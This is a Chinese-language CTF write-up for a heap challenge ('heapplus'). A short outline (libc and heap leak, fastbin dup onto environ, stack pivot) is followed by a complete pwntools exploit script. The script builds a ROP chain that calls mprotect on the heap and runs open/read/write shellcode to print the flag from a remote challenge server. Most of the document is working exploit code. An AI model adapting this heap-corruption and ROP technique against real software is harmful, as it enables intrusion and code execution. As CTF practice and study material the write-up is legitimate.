查看保护

查看ida

思路：

泄露libc和堆地址就不多说了，fastbin duf也不解释了。这里主要是利用fastbin duf在environ附近创建堆块，泄露environ中的栈地址，然后就利用fastbin duf修改rbp和返回地址进行栈迁移了，迁移目标地址是我们填充ROP的堆块地址（栈迁移前要完成修改堆块地址处权限、将ROP填充到堆块中。

这里我是根据官方的WP的思路复现的。

完整exp：

from pwn import*
context(log_level='debug',arch='amd64')
#p=process('./heapplus')
p=remote('gz.imxbt.cn',20680)

def alloc(index,size,content):
    p.sendlineafter(b'>>>',bytes(str(1).encode('utf-8')))
    p.sendlineafter(b'chunk_idx:',bytes(str(index).encode('utf-8')))
    p.sendlineafter(b'size: ',bytes(str(size).encode('utf-8')))
    p.sendafter(b'data:',content)
def free(index):
    p.sendlineafter(b'>>>',bytes(str(2).encode('utf-8')))
    p.sendlineafter(b'chunk id:',bytes(str(index).encode('utf-8')))
def show(index):
    p.sendlineafter(b'>>>',bytes(str(3).encode('utf-8')))
    p.sendlineafter(b'chunk id:',bytes(str(index).encode('utf-8')))
def exit():
    p.sendlineafter(b'>>>',bytes(str(4).encode('utf-8')))

for i in range(7):
    alloc(i,0x80,b'aaaa')
alloc(7,0x80,b'aaaa')
alloc(8,0x80,b'aaaa')
alloc(9,0x80,b'aaaa')
for i in range(7):
    free(i)
free(7)
free(8)
for i in range(7):
    alloc(i,0x80,b'aaaa')
alloc(10,0x18,p64(0x80)+p64(1))
show(7)
libcbase=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-(0x750dcd21ace0-0x750dcd000000)
show(10)
p.recv(8)
p.recv(8)
p.recv(8)
heapbase=u64(p.recv(8))- (0x57369a90c870 - 0x57369a90b000)
print(hex(heapbase))
for i in range(7):
    alloc(i,0x68,b'aa')
alloc(7,0x68,b'aa')
alloc(8,0x68,b'aa')
alloc(9,0x68,b'aa')
for i in range(7):
    free(i)
free(7)
free(8)
for i in range(7):
    alloc(i,0x68,b'aa')
alloc(10,0x18,p64(0x68)+p64(1))
for i in range(7):
    free(i)
free(7)
for i in range(7):
    alloc(i,0x68,b'aaaa')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
environ=libcbase+libc.sym['__environ']
pos=heapbase+(0x5a28a79cbb30-0x5a28a79cb000)
target=(pos>>12)^(environ-0x10)
alloc(7,0x68,p64(target))
alloc(8,0x68,b'aa')
alloc(7,0x68,b'aa')
alloc(7,0x68,b'a'*0x10)
show(7)
p.recvuntil(b'a'*0x10)
onestack=u64(p.recv(8))
rbp=onestack-(0x7ffecf5425e8-0x7ffecf5424c0)
rsp=onestack-(0x7ffecf5425e8-0x7ffecf5424c8)
for i in range(7):
    alloc(i,0x58,b'aa')
alloc(7,0x58,b'aa')
alloc(8,0x58,b'aa')
alloc(9,0x58,b'aa')
for i in range(7):
    free(i)
free(7)
free(8)
for i in range(7):
    alloc(i,0x58,b'aa')
alloc(10,0x18,p64(0x58)+p64(1))
for i in range(7):
    free(i)
free(7)
for i in range(7):
    alloc(i,0x58,b'aa')
ret=libcbase+0x0000000000029139
leave_ret=libcbase+0x000000000004da83
pop_rdi=libcbase+0x000000000002a3e5
pop_rsi=libcbase+0x000000000002be51
pop_rdx_r12=libcbase+0x000000000011f2e7
pop_rcx=libcbase+0x000000000003d1ee
pop_r8=libcbase+0x00000000001659e6
reads=libcbase+libc.sym['read']
mmap=libcbase+libc.sym['mmap']
mprotect=libcbase+libc.sym['mprotect']
block_addr=heapbase+(0x5acfdfaa5010-0x5acfdfaa3000)
block_addr2=heapbase+(0x5c22450170c0-0x5c2245015000)
payload=p64(pop_rdi)+p64(heapbase)
payload+=p64(pop_rsi)+p64(0x21000)
payload+=p64(pop_rdx_r12)+p64(7)+p64(0)
payload+=p64(mprotect)
payload+=p64(block_addr2+0x10)
alloc(11,0x80,payload)

payload=b'flag'
payload=payload.ljust(0x10,b'\x00')
payload+=asm(f'''
mov rdi,{block_addr2}
mov rsi,0
mov rax,2
syscall
mov rdi,3
mov rsi,{block_addr2}
mov rdx,0x40
mov rax,0
syscall
mov rdi,1
mov rsi,{block_addr2}
mov rdx,0x40
mov rax,1
syscall
''')
alloc(12,0x80,payload)
pos=heapbase+(0x644695eefeb0-0x644695eee000)
alloc(7,0x58,p64((rbp)^(pos>>12)))
alloc(8,0x58,b'aa')
alloc(7,0x58,b'aa')
alloc(7,0x58,p64(block_addr-0x8)+p64(leave_ret))
exit()

p.interactive()